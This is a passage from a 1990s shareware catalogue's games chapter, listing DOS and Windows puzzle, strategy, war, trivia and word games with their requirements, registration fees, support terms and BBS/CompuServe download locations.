challenge is to + find as many of the 2,339 unique soultions as possible to the 6 + x 10 puzzle. Each solution can be saved to disk, where the + program automatically checks for identical solutions, and can + be sent to the user's printer. The program features full mouse + and keyboard support with full animation of the moving pieces. + Also included is an optional grid and a moveable SpeedBar. + + Chapter 17, "Games" 612 + + + + Product: Super VGA Puzzle + Author: Cascoly Software (Steve Estvanik), 206-523-6135 + Version: 2.04 (05-14-94) + Needs: IBM PC, DOS 2.1 or better. VGA monitor; Mouse. + Registration fee: $20.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of phone, CompuServe, mail support; bonus utilities; + disks of other shareware; discounts on other products. + Look for: availability unknown on BBSs; PUZ.ZIP on CompuServe in + CIS:PCNEW forum LIBrary 5 (or contact userID 76703,3046 for + assistance). + SWREG#: 1709 + Download size: 300k (about 23 minutes with a 2400 baud modem) + Description: + Stunning images from around the world in SuperVGA color! The + ultimate puzzle game. Extremely flexible - choose any numbers + of pieces from 4 to 2000! Hall of fame for your best scores. + Save puzzles, solution hints, simple mouse interface, and much + more! Designed to use all major SVGA boards in 800 x 600 mode, + but also will work on VGA or EGA if needed. All puzzles use + original photography. + + + Product: Swimsuit + Glamour photography puzzle game. See full description on + page 503. + + Product: Tangram + Author: Judah Warshaw, +972-2-830-001 + Version: 1.1 (04-15-94) + Needs: IBM PC, DOS 3.3 or better. 384k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; VGA monitor; Mouse. + Registration fee: $12.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $3.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, CompuServe, mail support; bonus + utilities; bonus data; all ASP-wide offers (see page 6); disks + of other shareware; discounts on upgrades. + Look for: TANGRM11.ZIP on BBSs; TANGRM.ZIP on CompuServe in + CIS:PCNEW forum LIBrary 6 (or contact userID 100274,205 for + assistance). + SWREG#: 2464 + PsL#: 11293 + Download size: 75k (about six minutes with a 2400 baud modem) + Description: + The ancient Chinese jigsaw puzzle game. Unlike western jigsaw + puzzles, Tangram puzzles all use the same 7 pieces, from which + hundreds of forms can be created. Can be used for design, + inspiration, unlocking your imagination and just plain fun. + Comes with 50 puzzles to solve, built in screen saver, 360 + + Chapter 17, "Games" 613 + + + + degree piece control, 1/4 million color VGA support, save your + own puzzles and more! The endless possibilities have intrigued + people for centuries. Try solving a puzzle or two and see why. + + + Product: WINZLE + Author: Cascoly Software (Steve Estvanik), 206-523-6135 + Version: 1.10 (09-15-95) + Needs: IBM PC, DOS 3.1 or better. VGA monitor; Mouse. + Registration fee: $30.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: 3 months of unlimited mail support; all + ASP-wide offers (see page 6). + Look for: availability unknown on BBSs; WINZLE.ZIP on CompuServe + in CIS:WINFUN forum LIBrary 3 (or contact userID 76703,3046 for + assistance). + SWREG#: 2958 + Download size: 600k (about 45 minutes with a 2400 baud modem) + Description: + Stunning images from around the world in SuperVGA color! The + ultimate Windows puzzle game. Extremely flexible - choose any + numbers of pieces from 4 to 2000! Hall of fame for your best + scores. Save puzzles, solution hints, simple mouse interface, + and much more! All puzzles use original photography. + + + Product: XFIRE: Action Puzzle game + Author: Cascoly Software (Steve Estvanik), 206-523-6135 + Version: 1.02 (11-30-93) + Needs: IBM PC, DOS 3.3 or better. 500k RAM; VGA monitor; Hard + disk; Mouse. + Strongly recommended: EMS memory; XMS memory; sound card. + Registration fee: $20.00 (add $5.00 for shipping to U.S. + addresses) + Registration benefits: 3 months of unlimited phone, CompuServe, + mail support; bonus data; bonus graphics; bonus game hints; + disks of other shareware; discounts on other products; + discounts on upgrades. + Look for: availability unknown on BBSs; XFIRE.ZIP on CompuServe + in CIS:PCNEW forum LIBrary 6 (or contact userID 76703,3046 for + assistance). + SWREG#: 1710 + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + An action puzzle game: you start with a scrambled version of a + picture with moving pieces. Click on a puzzle piece to set the + crosshairs. Any pieces belonging on those axes, snap into + place. If only 1 piece remains on a row or column it pops into + place, too. Includes SoundBlaster special effects. You get + points for completing the puzzle in the shortest time, and for + completing rows and columns quickly. + + Chapter 17, "Games" 614 + + + + 17.12 Sayings & stories + + Product: Crowndale Tales : ESCAPE! + Author: Crowndale Productions (Paul and Cynthia Lurix), + 713-346-1552 + Version: 1.0 (08-17-95) + Needs: IBM 80386, Windows 3.1 or better. Hard disk; + VBRUN300.DLL. MCI services installed. + Strongly recommended: SVGA monitor. + Registration fee: $15.00 (add $4.50 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; 31/2" master disk(s); 3 + months of unlimited fax, CompuServe, mail support; bonus data; + all ASP-wide offers (see page 6); discounts on other products; + discounts on upgrades. + Look for: ESCAPE.ZIP on BBSs; ESCAPE.ZIP on CompuServe in + CIS:EFORUM forum LIBrary 0 (or contact userID 72435,40 for + assistance). + SWREG#: 6610 + Download size: 13500k (about 1002 minutes with a 2400 baud modem) + Description: + For the animal in all of us. ESCAPE! is the first tale in a + collection called Crowndale Tales. The tale is sophisticated + enough to appeal to an adult while simple enough in context for + a child. In the story, a wounded and helpless dove faces the + challenge of outwiting a cunning hyena. + + + Product: PC-Fortune + A no-repetition "fortune cookie" program. See full description + on page 247. + + Product: Rev. Lowell's Treasury of Humor + Searchable indexed Windows humor collection. See full + description on page 604. + + + 17.13 Simulators + + Product: WALL STREET RAIDER + Stock market/corporate takeover simulation. See full + description on page 621. + + Chapter 17, "Games" 615 + + + + 17.13.1 Sports + + Product: BassMap + Author: Arcanum Computing (Nels Anderson) + Version: 1.3 (09-01-94) + Needs: IBM PC, DOS 3.0 or better. 512k RAM; CGA monitor. + Strongly recommended: EGA monitor. + Registration fee: $10.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited BBS, CompuServe, mail support; all ASP-wide + offers (see page 6). + Look for: BASSMP13.ZIP on BBSs (call 508-788-6951 to download it + at no charge); BASSMP.ZIP on CompuServe in CIS:GAMERS forum + LIBrary 6 (or contact userID 71020,2613 for assistance). + Download size: 84k (about six minutes with a 2400 baud modem) + Description: + A utility that works with the fishing games BassTour, BassClass + and BassDuel. You can edit any existing lakes or create your + own lakes from scratch. Includes versions for CGA and EGA/VGA + systems. + + + Product: A Day at the Races + A betting horse racing game. See full description on page 601. + + Product: A Day at the Races + A betting horse racing game. See full description on page 601. + + + 17.14 Star Trek & Star Wars + + Product: EGATrek + Author: Arcanum Computing (Nels Anderson) + Version: 3.1 (09-01-94) + Needs: IBM PC, DOS 2.1 or better. 512k RAM; EGA monitor. + Registration fee: $15.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime BBS, CompuServe, mail support; disks of other + shareware. + Look for: EGATRK31.ZIP on BBSs (call 508-788-6951 to download it + at no charge); EGATRK.ZIP on CompuServe in CIS:GAMERS forum + LIBrary 7 (or contact userID 71020,2613 for assistance). + Download size: 130k (about ten minutes with a 2400 baud modem) + Awards & nominations: 1992 finalist, Shareware Industry Awards. + 1988 winner, Public Brand Software contests for useful + programs. + Description: + A colorful, hi-res version of the classic computer game. The + player is put in control of a powerful starship in a battle to + save the universe. The computer screen simulates the captain's + + Chapter 17, "Games" 616 + + + + command console with scanners, messages, damage control and + even a view outside the ship. Score is based on the time needed + to complete the mission with bonuses for rescues, ships + destroyed, etc. Supports only 640x350 16 color graphics. + + + 17.15 Strategy/simulation + + Product: Ancient Yacht + Author: LatticeWork Software + Version: 2.1 (11-01-95) + Needs: IBM 80386, Windows 3.1 or better. 580k RAM; VGA monitor; + Hard disk; Mouse. + Strongly recommended: sound card. + Registration fee: $9.95 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of CompuServe, mail support. 3-month + return policy. + Look for: availability unknown on BBSs; YT.ZIP on CompuServe in + CIS:WINFUN forum LIBrary 6 (or contact userID 74453,2112 for + assistance). + Download size: 300k (about 23 minutes with a 2400 baud modem) + Description: + Ancient Yacht is a dice game of luck and strategy similar to + Yahtzee but based on the original game of Yacht. An ancient + scroll and stone cup sit on a marble table waiting for your + play. Click on the cup and it shakes, and spills the dice onto + the table where they roll across the tabletop with accompanying + sound effects. Compete with a competitive computer player, or + play alone or with a friend. This version requires Windows + 3.1. + + Chapter 17, "Games" 617 + + + + Product: Ancient Yacht + Author: LatticeWork Software + Version: 2.0 (10-29-95) + Needs: IBM 80386, Windows 95 or better. 500k RAM; VGA monitor; + Hard disk; Mouse. + Strongly recommended: sound card. + Registration fee: $9.95 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of CompuServe, mail support. 3-month + return policy. + Look for: availability unknown on BBSs; YTB.ZIP on CompuServe in + CIS:WINFUN forum LIBrary 15 (or contact userID 74453,2112 for + assistance). + Download size: 300k (about 23 minutes with a 2400 baud modem) + Description: + Ancient Yacht is a dice game of luck and strategy similar to + Yahtzee but based on the original game of Yacht. An ancient + scroll and stone cup sit on a marble table waiting for your + play. Click on the cup and it shakes, and spills the dice onto + the table where they roll across the tabletop with accompanying + sound effects. Compete with a competitive computer player, or + play alone or with a friend. This version requires Windows 95. + + + Product: ATC: Air Traffic Controller + Author: Cascoly Software (Steve Estvanik), 206-523-6135 + Version: 1.0 (09-29-85) + Needs: IBM PC, DOS 2.0 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; CGA + monitor; Hercules monitor. + Registration fee: $20.00 (add $4.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited phone, CompuServe, mail support; disks of + other shareware; discounts on other products. + Look for: ATC.ZIP on BBSs; ATC.ZIP on CompuServe in CIS:PCNEW + forum LIBrary 6 (or contact userID 76703,3046 for assistance). + Download size: 60k (about five minutes with a 2400 baud modem) + Description: + An air traffic controller game that's perfect for a few minutes + or hours of fun. Easy to learn, but difficult to master. The + game tracks best scores at each of 20 levels of difficulty. + Ages 10 and up. + + Chapter 17, "Games" 618 + + + + Product: BATTLE CHARGE + Author: Cold Water Software (Gene Brown), 612-906-0955 + Version: 1.04 (10-07-95) + Needs: IBM PC, DOS 2.0 or better. 300k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; VGA monitor; Mouse. + Strongly recommended: Hard disk; math coprocessor. + Registration fee: $15.00 + Registration benefits: quick-reference card; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited CompuServe, mail support; + 3-month return policy; all ASP-wide offers (see page 6). + Lifetime free upgrading allowed. + Look for: BTC100.ZIP on BBSs; BTC.ZIP on CompuServe in CIS:GAMERS + forum LIBrary 7 (or contact userID 73423,3415 for assistance). + Download size: 120k (about nine minutes with a 2400 baud modem) + Description: + A two-player strategy game played on a grid with two sets of + opposing (red vs. blue) neutral and charged pieces. A player + moves by choosing an initial velocity for one of his pieces, + which then follows a trajectory influenced (for a charged + piece) by the distribution of other charges on the board. The + motion ends following a collision with another piece. The game + ends when a charged piece captures (collides with) its opposing + king. + + + Product: Border + Author: Cascoly Software (Steve Estvanik), 206-523-6135 + Version: 1.1 (02-23-89) + Needs: IBM PC, DOS 2.1 or better. CGA monitor. + Registration fee: $20.00 (add $4.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: 3 months of phone, CompuServe support. + Look for: BORDER.ZIP on BBSs; BORDER.ZIP on CompuServe in + CIS:PCNEW forum LIBrary 6 (or contact userID 76703,3046 for + assistance). + Download size: 70k (about five minutes with a 2400 baud modem) + Description: + A combination of GO and connect the dots, this abstract + strategy game for 2 players involves enclosing more area than + your opponent, while preventing them from stopping you. Ages 12 + and up. + + Chapter 17, "Games" 619 + + + + Product: COLOR CROSS + Author: Cold Water Software (Gene Brown), 612-906-0955 + Version: 1.05 (10-07-95) + Needs: IBM PC, DOS 2.0 or better. 300k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; VGA monitor; Mouse. + Strongly recommended: Hard disk. + Registration fee: $15.00 + Registration benefits: quick-reference card; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited CompuServe, mail support. + 3-month return policy. Lifetime free upgrading allowed. + Look for: CLRX1.ZIP on BBSs (call 701-772-5399 to download it at + no charge); CLX.ZIP on CompuServe in CIS:GAMERS forum LIBrary 7 + (or contact userID 73423,3415 for assistance). + Download size: 120k (about nine minutes with a 2400 baud modem) + Description: + A unique, abstract and kinetic two-player strategy game played + on a grid of gray and colored terrain squares. On a given turn, + a player sets a sequence of up to four pieces in motion, which + interact with existing terrain and modify it by leaving colored + trails. Collisions between pieces cause opposing pieces to + freeze and allied pieces to thaw (if frozen) and move. The game + ends when all of one player's pieces are frozen. Players may + edit and save any existing board configuration. + + + Product: A Day at the Races + A betting horse racing game. See full description on page 601. + + Product: A Day at the Races + A betting horse racing game. See full description on page 601. + + Product: The Deer Expert + Gives methods for whitetail deer hunting,logs. See full + description on page 544. + + Product: Discover Karate 1 - White Belt + Learn Beginning Karate. See full description on page 574. + + Product: Ecomaster + Ecology strategy game. See full description on page 473. + + Product: Econ's Arena + Fantasy chess-like strategy game. See full description on + page 591. + + Product: The Fish Expert + Finds fishing techniques; log, library tools. See full + description on page 545. + + Chapter 17, "Games" 620 + + + + Product: GREEN + Author: Cascoly Software (Steve Estvanik), 206-523-6135 + Version: 1.11 (05-10-93) + Needs: IBM PC, DOS 3.3 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; EGA + monitor; Mouse. + Registration fee: $20.00 (add $4.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of phone, CompuServe, mail support; bonus utilities; + bonus data; disks of other shareware; discounts on other + products. + Look for: availability unknown on BBSs; GREEN.ZIP on CompuServe + in CIS:PCNEW forum LIBrary 6 (or contact userID 76703,3046 for + assistance). + SWREG#: 358 + Download size: 140k (about eleven minutes with a 2400 baud modem) + Description: + Help the planters as they work to prevent the pavers from + turning farms into parking lots. Pavers include mall + developers, real estate agents, clear-cut loggers and other + exploiters. There are several different maps, of varying + difficulty. You have the ability to plant hedges, add walls, + and to destroy pavement. Unique, yet similar in concept to + Populous and SimCity. + + + Product: Towers + Author: Cascoly Software (Steve Estvanik), 206-523-6135 + Version: 1.27 (02-20-93) + Needs: IBM PC, DOS 3.3 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; EGA + monitor; Mouse. + Registration fee: $20.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of phone, CompuServe, mail support; bonus utilities; + disks of other shareware; discounts on other products. + Look for: availability unknown on BBSs; TOWER.ZIP on CompuServe + in CIS:PCNEW forum LIBrary 6 (or contact userID 76703,3046 for + assistance). + SWREG#: 318 + Download size: 100k (about eight minutes with a 2400 baud modem) + Description: + How high can you build? Similar to Tetris, since you need to + place blocks of varying size. That's where the similarity ends + - you need logic and planning, rather than quick reflexes. You + build one level of the tower at a time, trying to fit the + blocks in the tightest pattern. Each level becomes the base + for the next level. Uses Cascoly's unique 3-D perspective + graphics to show fantastic detail. As you scroll from side to + side, the perspective changes. + + Chapter 17, "Games" 621 + + + + Product: WALL STREET RAIDER + Author: RONIN Software, 206-391-4036 + Version: 4.2 (04-30-94) + Needs: IBM PC, DOS 2.1 or better. 640k RAM; Hard disk. Does not + run on IBM PCjr. + Strongly recommended: CGA monitor. + Registration fee: $25.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 3 months of unlimited phone, mail + support; discounts on other products. 1 free update disk(s) + sent out. + Look for: WSR4_2.ZIP on BBSs (call 703-680-9269 to download it at + no charge). + Download size: 455k (about 34 minutes with a 2400 baud modem) + Description: + A high-stakes, nonstop game of corporate finance, with "live" + stock ticker, where 1-4 players (& computer) battle for profits + in an amazingly realistic simulation. Has 250 companies in 36 + industry groups, each trying to dominate its own industry and + crush the competition, while players seek to get rich, do + takeovers, greenmail, LBO's, mergers, issue junk bonds (and + play dirty) to grasp and control the world's largest + corporations, from Exxon on down. The ultimate in realistic + stock market games! + + + Product: WEBS + Author: Cascoly Software (Steve Estvanik), 206-523-6135 + Version: 1.2 (06-11-92) + Needs: IBM PC, DOS 3.0 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; EGA + monitor; Mouse. + Registration fee: $20.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of phone, CompuServe, mail support; disks of other + shareware; discounts on other products. + Look for: availability unknown on BBSs; WEBS.ZIP on CompuServe in + CIS:PCNEW forum LIBrary 6 (or contact userID 76703,3046 for + assistance). + SWREG#: 1707 + Download size: 70k (about five minutes with a 2400 baud modem) + Description: + A deceptively simple solitaire game requiring both strategy and + cunning. You claim nodes on a web while trying to limit the + moves available to your opponent. Automatic display of + potential moves, a variety of webs and difficulties give hours + of challenge. + + + Product: XFIRE: Action Puzzle game + Action Puzzle game. See full description on page 613. + + Chapter 17, "Games" 622 + + + + 17.15.1 War games + + Product: Declaration of War + Author: Burnham Park Software, Inc., 312-922-6313 + Version: 1.1 (08-15-94) + Needs: IBM AT (80286), Windows 3.1 or better. 2048k RAM; EGA + monitor; Hard disk. + Strongly recommended: VGA monitor. + Registration fee: $39.95 (add $1.00 for shipping to Canadian + addresses) (add $3.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, BBS, CompuServe, mail + support; bonus data; all ASP-wide offers (see page 6); + discounts on other products; discounts on upgrades. Lifetime + free upgrading allowed. + Look for: DOWAR11.ZIP on BBSs (call 312-922-2839 to download it + at no charge); DOWAR*.ZIP on CompuServe in CIS:WINFUN forum + LIBrary 18 (or contact userID 71532,3271 for assistance). + SWREG#: 3242 + PsL#: 11535 + Download size: 248k (about 19 minutes with a 2400 baud modem) + Description: + A Windows strategy/war game set in modern times. Allows for up + to six human or computer players, play- by-mail games, + handicapping with 24 strength levels, and 14 types of pieces. + On-line help. + + + Product: Medieval War + Author: Burnham Park Software, Inc., 312-922-6313 + Version: 1.5 (02-16-95) + Needs: IBM 80386, Windows 3.1 or better. 2048k RAM; EGA monitor; + Hard disk. + Strongly recommended: VGA monitor. + Registration fee: $29.95 (add $1.00 for shipping to Canadian + addresses) (add $3.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, BBS, CompuServe, mail + support; bonus data; discounts on other products; discounts on + upgrades. Lifetime free upgrading allowed. + Look for: MEDWAR12.ZIP on BBSs (call 312-922-2839 to download it + at no charge); MEDWA*.ZIP on CompuServe in CIS:WINFUN forum + LIBrary 18 (or contact userID 71532,3271 for assistance). + SWREG#: 4917 + Download size: 242k (about 18 minutes with a 2400 baud modem) + Description: + A Windows war/strategy game set in medieval times. Allows for + up to six human or computer players, play-by-mail games, + handicapping with 24 strength levels, and 14 different types of + pieces. On-line help. + + Chapter 17, "Games" 623 + + + + Product: Medieval War Door + BBS door game for medieval war/strategy. See full description + on page 361. + + + 17.16 Trivia + + Product: Enigmacross for Windows + Solve and construct acrostic puzzles. See full description on + page 629. + + Product: Have You Read That Movie? + Author: 100% Cotton Software, 717-289-4019 + Version: 1.0 (04-01-91) + Needs: IBM PC, DOS 2.0 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: $10.00 (add $3.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, mail support; disks of other + shareware. + Look for: LITQUIZ1.ZIP on BBSs. + Download size: 95k (about seven minutes with a 2400 baud modem) + Description: + An entertainment-educational program that tests the user's + knowledge of literature and film via a multiple-choice format. + 365+ questions (easy, medium & hard) about films based on + literary works. Each correct answer is accompanied by some + interesting fact(s) about the movie or literary work. Three + modes of play: Single Player, Two Players Alternate, and Two + Players Compete (quickest player answers). Many configuration + options. On-line help. Mouse or keyboard. + + + Product: On This Day + "What happened on this day in history?" See full description + on page 469. + + Product: On This Day for Windows + "What happened on this day in history?" See full description + on page 469. + + Product: Personal Challenge + Educational trivia game for 1-4 players. See full description + on page 460. + + Chapter 17, "Games" 624 + + + + 17.17 Word games + + Product: Cipher + Author: Arcanum Computing (Nels Anderson) + Version: 2.2 (09-01-94) + Needs: IBM PC, DOS 2.1 or better. 512k RAM. + Strongly recommended: EGA monitor; Hard disk; Mouse. + Registration fee: $15.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime BBS, CompuServe, mail support; disks of other + shareware. Bonus puzzles. + Look for: CIPHER22.ZIP on BBSs (call 508-788-6951 to download it + at no charge); CIPHER.ZIP on CompuServe in CIS:GAMERS forum + LIBrary 13 (or contact userID 71020,2613 for assistance). + Download size: 104k (about eight minutes with a 2400 baud modem) + Description: + A crypto-quotes type word puzzle game, similar to the kind you + might find in the Sunday newspaper. However, this version runs + in colorful hi-res VGA or EGA graphics mode and allows you to + play using a mouse (text modes and keyboard are also + supported). Features include help, hints, save/restore. User + can create their own puzzle files from either plain text quotes + or from already encrypted quotes. + + + Product: Cipher for Windows + Author: Arcanum Computing (Nels Anderson) + Version: 1.1 (09-01-94) + Needs: IBM PC, Windows 3.0 or better. + Strongly recommended: Mouse. + Registration fee: $15.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime BBS, CompuServe, mail support; disks of other + shareware. Bonus puzzles. + Look for: CIPHWN11.ZIP on BBSs (call 508-788-6951 to download it + at no charge); CIPHWN.ZIP on CompuServe in CIS:GAMERS forum + LIBrary 13 (or contact userID 71020,2613 for assistance). + Download size: 112k (about nine minutes with a 2400 baud modem) + Description: + A crypto-quotes type word puzzle game, similar to the kind you + might find in the Sunday newspaper. However, this version runs + in colorful hi-res VGA or EGA graphics mode under the Microsoft + Windows 3.x environment and allows you to play using a mouse. + Features include standard Windows style hypertext help, hints, + save/restore. User can also create their own puzzle files from + plain text or already encrypted quotes. + + Chapter 17, "Games" 625 + + + + Product: Crossword Clipper for DOS + Crossword puzzle layout/publishing tool. See full description + on page 187. + + Product: Crossword Clipper for Windows + Crossword puzzle layout/publishing tool. See full description + on page 188. + + Product: Crossword Creator + Multi-lingual crossword puzzle editor. See full description on + page 446. + + Product: Fictionary + Author: Cascoly Software (Steve Estvanik), 206-523-6135 + Version: 1.32 (04-30-90) + Needs: IBM PC, DOS 2.1 or better. + Registration fee: $20.00 + Registration benefits: 3 months of phone, CompuServe support. + Look for: availability unknown on BBSs; FICT.ZIP on CompuServe in + CIS:PCNEW forum LIBrary 8 (or contact userID 76703,3046 for + assistance). + Download size: 70k (about five minutes with a 2400 baud modem) + Description: + The game of fantastic and farfetched definitions. Each round a + player chooses a word. You can choose your own word or pick one + from the large selection included with the game. Each other + player makes up their own definition for the word. Everyone + votes for the word they think is correct and points are scored + for guessing the proper one, or misleading other players. Great + vocabulary builder. Can be played by 1-6. + + + Product: Hang Man + Author: Burnham Park Software, Inc., 312-922-6313 + Version: 1.1 (08-16-94) + Needs: IBM AT (80286), Windows 3.1 or better. 1024k RAM; EGA + monitor; Hard disk. + Strongly recommended: VGA monitor. + Registration fee: $12.00 (add $1.00 for shipping to Canadian + addresses) (add $3.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, BBS, CompuServe, mail + support; all ASP-wide offers (see page 6); discounts on other + products; discounts on upgrades. Lifetime free upgrading + allowed. + Look for: HANMAN10.ZIP on BBSs (call 312-922-2839 to download it + at no charge); HANMA*.ZIP on CompuServe in CIS:WINFUN forum + LIBrary 14 (or contact userID 71532,3271 for assistance). + Download size: 128k (about ten minutes with a 2400 baud modem) + Description: + A Windows word game for adults and children. The object is to + guess the word before the hang man is complete. On-line help. + + Chapter 17, "Games" 626 + + + + Product: HangWin + Author: Temprano Software + Version: 2.04 (07-15-95) + Needs: IBM AT (80286), Windows 3.1 or better. VGA monitor. + Registration fee: $11.95 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited CompuServe, mail support; bonus data; all + ASP-wide offers (see page 6). + Look for: availability unknown on BBSs; HNGWIN.ZIP on CompuServe + in CIS:WINFUN forum LIBrary 4. + Download size: 256k (about 19 minutes with a 2400 baud modem) + Description: + The traditional hangman word game. Guess the word (or phrase) + before the prisoner hangs. Word puzzles are randomly chosen + from a dictionary. The dictionary may be user-defined. For + fun, the user may choose the prisoner. The prisoner's face is + animated. Can use Window-supported sound boards and also + includes an easy-to-use installation utility and extensive on- + line help. + + + Product: POETRY STAR + An AI poetry tutor that chats & cracks jokes. See full + description on page 440. + + Product: Word Wrestle + Author: Insight Software Solutions, Inc. (Michael D. Jones), + 801-295-1890 + Version: 1.1 (01-10-96) + Needs: IBM AT (80286), Windows 3.1 or better. 4096k RAM; Hard + disk; Mouse. + Strongly recommended: sound card. + Registration fee: $18.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); 12 months of unlimited + phone, fax, BBS, CompuServe, mail support; 3-month limited + return policy; all ASP-wide offers (see page 6). + Look for: WORDW110.ZIP on BBSs; WORDW.ZIP on CompuServe in + CIS:UKSHARE forum LIBrary 4 (or contact userID 71672,3464 for + assistance). + Download size: 800k (about 60 minutes with a 2400 baud modem) + Description: + A word game similar to the popular Boggle(tm) game. Set timer, + set scoring options, 100000 word dictionary (American or + British), modify dictionary, print puzzles, save puzzles and + more. Generate puzzles in various sizes, bitmaps and fonts. + Improve your spelling and word recognition. Teachers and + parents can design puzzles to include the words you want. + + Chapter 17, "Games" 627 + + + + Product: WORDS + Author: DynoTech Software (David Carlson), 573-774-5001 + Version: 1.0 (01-09-96) + Needs: IBM 80386, Windows 95 or better. 8000k RAM; SVGA monitor; + Hard disk; Mouse; sound card. + Registration fee: $20.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; 31/2" master + disk(s); lifetime unlimited phone, fax, BBS, CompuServe, + newsletter, mail support; 1-month limited return policy; bonus + data; bonus graphics; bonus game levels; all ASP-wide offers + (see page 6); discounts on upgrades. + Look for: WORDS10.ZIP on BBSs (call 573-774-5907 to download it + at no charge). + Download size: 1400k (about 104 minutes with a 2400 baud modem) + Description: + Maneuver falling letters to spell selected words while watching + out for various "hazards." Get more points for spelling + quickly. Contains stunning graphics, music, sound effects, and + more. + + + 17.17.1 Crossword puzzles + + Product: Crossdown for Windows + Author: Crossdown (Sam Bellotto Jr.), 716-482-8092 + Version: 2.2 (11-14-95) + Needs: IBM PC, Windows 3.0 or better. 640k RAM; VGA monitor; + Hard disk; HP DeskJet printer; HP LaserJet printer; Postscript + printer; Mouse; Epson printer; sound card. + Registration fee: $55.75 (Canadian dollars) (add $63.75 (Canadian + dollars) for shipping to Canadian addresses) (add $68.75 + (Canadian dollars) for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; 31/2" master disk(s); lifetime + unlimited phone, CompuServe, newsletter, mail support; 2-month + return policy; bonus utilities; bonus data; bonus game hints; + all ASP-wide offers (see page 6); discounts on other products; + discounts on upgrades; registration commissions. 3-month free + upgrading allowed. 1 free update disk(s) sent out. Puzzle + construction and marketing assistance. + Look for: XWDWIN21.ZIP on BBSs; XWDWIN.ZIP on CompuServe in + CIS:ASPCD forum LIBrary 11 (or contact userID 70724,2075 for + assistance). + SWREG#: 6872 + Download size: 290k (about 22 minutes with a 2400 baud modem) + Description: + Solve and construct professional crossword puzzles on your + Windows computer. Print out in a variety of formats, too. + Software is extremely user-friendly. Comes with extensive on- + line documentation. Used by many professional constructors + around the world and endorsed by John M. Samson, editor of the + Simon and Schuster Crossword Puzzle books. + + Chapter 17, "Games" 628 + + + + Product: Crossword Construction Kit + Author: Insight Software Solutions, Inc. (Michael D. Jones), + 801-295-1890 + Version: 2.0 (12-20-95) + Needs: IBM AT (80286), Windows 3.1 or better. 4096k RAM. + Registration fee: $18.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $3.00 for shipping outside U.S. or Canada) + Registration benefits: 3 months of unlimited 